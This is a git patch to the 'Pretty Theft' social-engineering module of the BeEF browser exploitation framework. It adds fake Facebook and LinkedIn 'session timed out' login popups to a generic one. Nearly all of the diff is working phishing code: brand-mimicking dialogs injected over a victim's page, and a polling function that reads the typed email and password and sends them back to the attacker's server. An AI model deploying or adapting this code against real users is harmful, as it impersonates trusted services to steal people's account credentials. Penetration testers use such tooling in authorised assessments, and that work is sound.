From 483683ca78deb71f7d128e27f81fb523fe4d4f7b Mon Sep 17 00:00:00 2001
From: pwndizzle <root@hacker.(none)>
Date: Sat, 22 Sep 2012 18:38:09 +0800
Subject: [PATCH] Added Facebook and Linkedin popups, also some code/logic
 improvements

---
 .../pretty_theft/command.js                   | 143 ++++++++++++++----
 .../pretty_theft/config.yaml                  |   4 +-
 .../social_engineering/pretty_theft/module.rb |   6 +-
 3 files changed, 123 insertions(+), 30 deletions(-)

diff --git a/modules/social_engineering/pretty_theft/command.js b/modules/social_engineering/pretty_theft/command.js
index f53d6e311..911ffd801 100644
--- a/modules/social_engineering/pretty_theft/command.js
+++ b/modules/social_engineering/pretty_theft/command.js
@@ -50,16 +50,18 @@ beef.execute(function() {
 	  }
 	  if (vis) {
 	    // Calculate the page width and height 
-	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
-	        var pageWidth = document.body.scrollWidth+'px';
-	        var pageHeight = document.body.scrollHeight+'px';
-	    } else if( document.body.offsetWidth ) {
-	      var pageWidth = document.body.offsetWidth+'px';
-	      var pageHeight = document.body.offsetHeight+'px';
-	    } else {
+	    //if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+	    //    var pageWidth = document.body.scrollWidth+'px';
+	    //    var pageHeight = document.body.scrollHeight+'px';
+	    //} else if( document.body.offsetWidth ) {
+	    //  var pageWidth = document.body.offsetWidth+'px';
+	    //  var pageHeight = document.body.offsetHeight+'px';
+	    //} else {
+	    
+	    // Previous lines were not rendering page background correctly
 	       var pageWidth='100%';
 	       var pageHeight='100%';
-	    }
+	    //}
 	    //set the shader to cover the entire page and make it visible.
 	    dark.style.opacity=opaque;
 	    dark.style.MozOpacity=opaque;
@@ -74,46 +76,133 @@ beef.execute(function() {
 	  }
 	}
 
-	// function to send response
+	// CURRENTLY NOT USED
+	// Send done prompt to user
 	function win(){
-		document.getElementById('hax').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>';
+		document.getElementById('popup').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>';
 		answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;
 	}
 
-	// perform darkening
-	grayOut(true);
 
+	// Check whether the user has entered a user/pass and pressed ok
 	function checker(){
-		processval = document.body.lastChild.getElementsByTagName("input")[2].value;
-		if (processval == "Processing..") {
-			uname = document.body.lastChild.getElementsByTagName("input")[0].value;
-			pass = document.body.lastChild.getElementsByTagName("input")[1].value;
-			answer = uname+":"+pass
+		uname1 = document.body.lastChild.getElementsByTagName("input")[0].value;
+		pass1 = document.body.lastChild.getElementsByTagName("input")[1].value;
+		valcheck = document.body.lastChild.getElementsByTagName("input")[3].value;
+		
+		if (uname1.length > 0 && pass1.length > 0 && valcheck == "true") {
+			// Join user/pass and send to attacker
+			answer = uname1+":"+pass1
   			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);	
-			// set lastchild invisible
+			// Set lastchild invisible
 			document.body.lastChild.setAttribute('style','display:none');
-			// lighten screen
-			grayOut(false);
 			clearInterval(credgrabber);
-			$j('#hax').remove();
+			// Lighten screen
+			grayOut(false);
+			$j('#popup').remove();
 			$j('#darkenScreenObject').remove();
+
+		}else if((uname1.length == 0 || pass1.length == 0) && valcheck == "true"){
+		// If user has not entered any data reset button
+		document.body.lastChild.getElementsByTagName("input")[3].value = "false";
+		alert("Please enter a valid username and password.");		
 		}
 	}
 
 
-	// floating div
-	function writeit() {
+	// Facebook floating div
+	function facebook() {
+
 		sneakydiv = document.createElement('div');
-		sneakydiv.setAttribute('id', 'hax');
-		sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
+		sneakydiv.setAttribute('id', 'popup');
+		sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;');
+		document.body.appendChild(sneakydiv);
+		
+		// Set appearance using styles, maybe cleaner way to do this with CSS block?
+		var windowborder = 'style="width:330px;background:white;border:10px #999999 solid;border-radius:8px"';
+		var windowmain = 'style="border:1px #555 solid;"';
+ 		var tbarstyle = 'style="color: rgb(255, 255, 255); background-color: rgb(109, 132, 180);font-size: 13px;font-family:tahoma,verdana,arial,sans-serif;font-weight: bold;padding: 5px;padding-left:8px;text-align: left;height: 18px;"';
+		var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"';
+		var messagestyle = 'style="align:left;font-size:11px;font-family:tahoma,verdana,arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"';
+		var box_prestyle = 'style="color: grey;font-size: 11px;font-weight: bold;font-family: tahoma,verdana,arial,sans-serif;padding-left:30px;"';
+		var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color: rgb(109,132,180);"';	
+		var buttonstyle = 'style="font-size: 13px;background:#627aac;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"';
+ 
+        	var title = 'Facebook Session Timed Out';
+	        var messagewords = 'Your session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.';
+        	var buttonLabel = '<input type="button" name="ok" value="Log in" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>';
+
+		// Build page including styles
+		sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Email: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>';
+		
+		// Repeatedly check if button has been pressed
+		credgrabber = setInterval(checker,1000);
+	}
+
+
+	// Linkedin floating div
+	function linkedin() {
+
+		sneakydiv = document.createElement('div');
+		sneakydiv.setAttribute('id', 'popup');
+		sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;');
+		document.body.appendChild(sneakydiv);
+
+		// Set appearance using styles, maybe cleaner way to do this with CSS block?
+		var windowborder = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"';
+		var windowmain = 'style="border:1px #555 solid;"';
+ 		var tbarstyle = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 22px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top,  #919191,  #595959);"';
+
+//-moz-box-shadow: 0 1px 4px #ccc;-webkit-box-shadow: 0 1px 4px #CCC;-o-box-shadow: 0 1px 4px #ccc;box-shadow: 0 1px 4px #CCC;
+
+		var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"';
+		var messagestyle = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"';
+		var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"';
+		var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"';	
+		var buttonstyle = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"';
+		var lilogo = 'http://press.linkedin.com/sites/all/themes/presslinkedin/images/LinkedIn_Logo_Web_Reverse_Trans2.png';
+        	var title = 'Session Timed Out <img src="' + lilogo + '" align=right height=20 width=70 alt="LinkedIn">';
+	        var messagewords = 'Your session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.';
+        	var buttonLabel = '<input type="button" name="ok" value="Sign In" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>';
+
+		// Build page including styles
+		sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Email: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>';
+
+		// Repeatedly check if button has been pressed
+		credgrabber = setInterval(checker,1000);
+	}
+
+
+	// Generic floating div with image
+	function generic() {
+		sneakydiv = document.createElement('div');
+		sneakydiv.setAttribute('id', 'popup');
+		sneakydiv.setAttribute('style', 'width:400px;position:absolute; top:20%; left:40%; z-index:51; background-color:white;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
 		sneakydiv.setAttribute('align', 'center');
 		document.body.appendChild(sneakydiv);
-		sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"lul\").value=\"Processing..\";\' value=\'Continue\'>';
+		sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"buttonpress\").value=\"true\";\' value=\'Ok\'><br/><input type="hidden" id="buttonpress" name="buttonpress" value="false"/>';
+		
+		// Repeatedly check if button has been pressed		
 		credgrabber = setInterval(checker,1000);
 
 	}
 	
-	writeit();
+	// Set background opacity and apply background 
+	var backcolor = "<%== @backing %>";	  
+	if(backcolor == "Grey"){
+	grayOut(true,{'opacity':'70'});
+	}else if(backcolor == "Clear"){
+	grayOut(true,{'opacity':'0'});
+	}
 
+	// Retrieve the chosen div option from Beef and display
+	var choice = "<%= @choice %>";	
+	if(choice == "Facebook"){	
+	facebook();
+	} else if(choice == "LinkedIn"){
+	linkedin();	
+	} else{
+	generic();	
+	}
 
 });
diff --git a/modules/social_engineering/pretty_theft/config.yaml b/modules/social_engineering/pretty_theft/config.yaml
index ac175d6cd..e03c356bc 100644
--- a/modules/social_engineering/pretty_theft/config.yaml
+++ b/modules/social_engineering/pretty_theft/config.yaml
@@ -19,7 +19,7 @@ beef:
             enable: true
             category: "Social Engineering"
             name: "Pretty Theft"
-            description: "Asks the user for their username and password using a tidy floating div."
-            authors: ["vt [nick.freeman@security-assessment.com]", "xntrik"]
+            description: "Asks the user for their username and password using a floating div."
+            authors: ["pwndizzle", "vt [nick.freeman@security-assessment.com]", "xntrik"]
             target:
                 user_notify: ['ALL']
diff --git a/modules/social_engineering/pretty_theft/module.rb b/modules/social_engineering/pretty_theft/module.rb
index a816340c9..437f59819 100644
--- a/modules/social_engineering/pretty_theft/module.rb
+++ b/modules/social_engineering/pretty_theft/module.rb
@@ -19,7 +19,11 @@ class Pretty_theft < BeEF::Core::Command
     configuration = BeEF::Core::Configuration.instance
     logo_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png"
     return [
-        {'name' =>'imgsauce', 'description' =>'Custom Logo', 'ui_label'=>'Custom Logo', 'value' => logo_uri}
+		{'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true },
+       		
+		{'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'],['Clear']], 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true },
+
+		{'name' =>'imgsauce', 'description' =>'Custom Logo', 'ui_label'=>'Custom Logo (Generic only)', 'value' => logo_uri}
     ]
   end